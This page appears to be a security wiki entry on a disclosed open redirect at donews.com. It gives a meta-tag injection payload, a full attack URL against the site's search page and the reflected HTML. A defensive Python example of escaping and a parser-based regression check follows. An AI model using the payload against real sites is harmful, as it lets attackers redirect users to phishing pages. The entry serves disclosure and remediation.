Open Redirect at donews.com

From Hackipedia
OpenBugBounty #255232
Target: DoNews
Target Module:
Type: Open Redirect
Original Link
Payload: 0;url=///example.org" http-equiv="refresh

Meta tags are a common injection point because web developers try to boost page relevancy by reflecting user input into them.

It is possible to make a page redirect through a meta tag by appending ;url= to the value of the content attribute. The payload must then break out of the attribute and add an http-equiv attribute to force the page to refresh.


With the advent of Open Graph meta tags, this vulnerability will be around for a long time to come.


Attack URL:

http://www.donews.com/search/search_word?keyword=0;url=///openbugbounty.org" http-equiv="refresh

Result:

<meta name="keywords" content="0;url=///openbugbounty.org" http-equiv="refresh" />
<meta name="description" content="0;url=///openbugbounty.org" http-equiv="refresh" />
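
The fix for the result above is to HTML-escape the reflected value before it is placed in the attribute. The following is an added example, not code from the original page or from the affected site: `render_unsafe`, `render_safe` and `has_injected_refresh` are hypothetical names, and the unescaped concatenation is an assumed reconstruction of the server-side template. It renders the page's payload both ways and parses the output to check whether a keywords/description tag has gained an `http-equiv` attribute.

```python
import html
from html.parser import HTMLParser

# Payload exactly as listed on this page.
PAYLOAD = '0;url=///example.org" http-equiv="refresh'

def render_unsafe(keyword):
    # Assumed vulnerable pattern: value concatenated into the attribute unescaped.
    return '<meta name="keywords" content="' + keyword + '" />'

def render_safe(keyword):
    # quote=True encodes " as &quot;, so the value cannot close the attribute.
    return '<meta name="keywords" content="' + html.escape(keyword, quote=True) + '" />'

class MetaCollector(HTMLParser):
    """Records each <meta> tag's attributes as an HTML parser sees them."""
    def __init__(self):
        super().__init__()
        self.metas = []

    def handle_starttag(self, tag, attrs):
        # Also called for self-closing <meta ... /> via handle_startendtag.
        if tag == "meta":
            self.metas.append(dict(attrs))

def parse_metas(markup):
    collector = MetaCollector()
    collector.feed(markup)
    collector.close()
    return collector.metas

def has_injected_refresh(markup):
    # A keywords/description tag must never also carry http-equiv; if it does,
    # reflected input has broken out of the content attribute.
    for attrs in parse_metas(markup):
        if attrs.get("name") in ("keywords", "description") and \
           (attrs.get("http-equiv") or "").lower() == "refresh":
            return True
    return False

if __name__ == "__main__":
    for render in (render_unsafe, render_safe):
        out = render(PAYLOAD)
        print(render.__name__, has_injected_refresh(out), out)
```

The same parser check can be run over rendered search pages in a regression test, so that a template change that drops the escaping is caught before release.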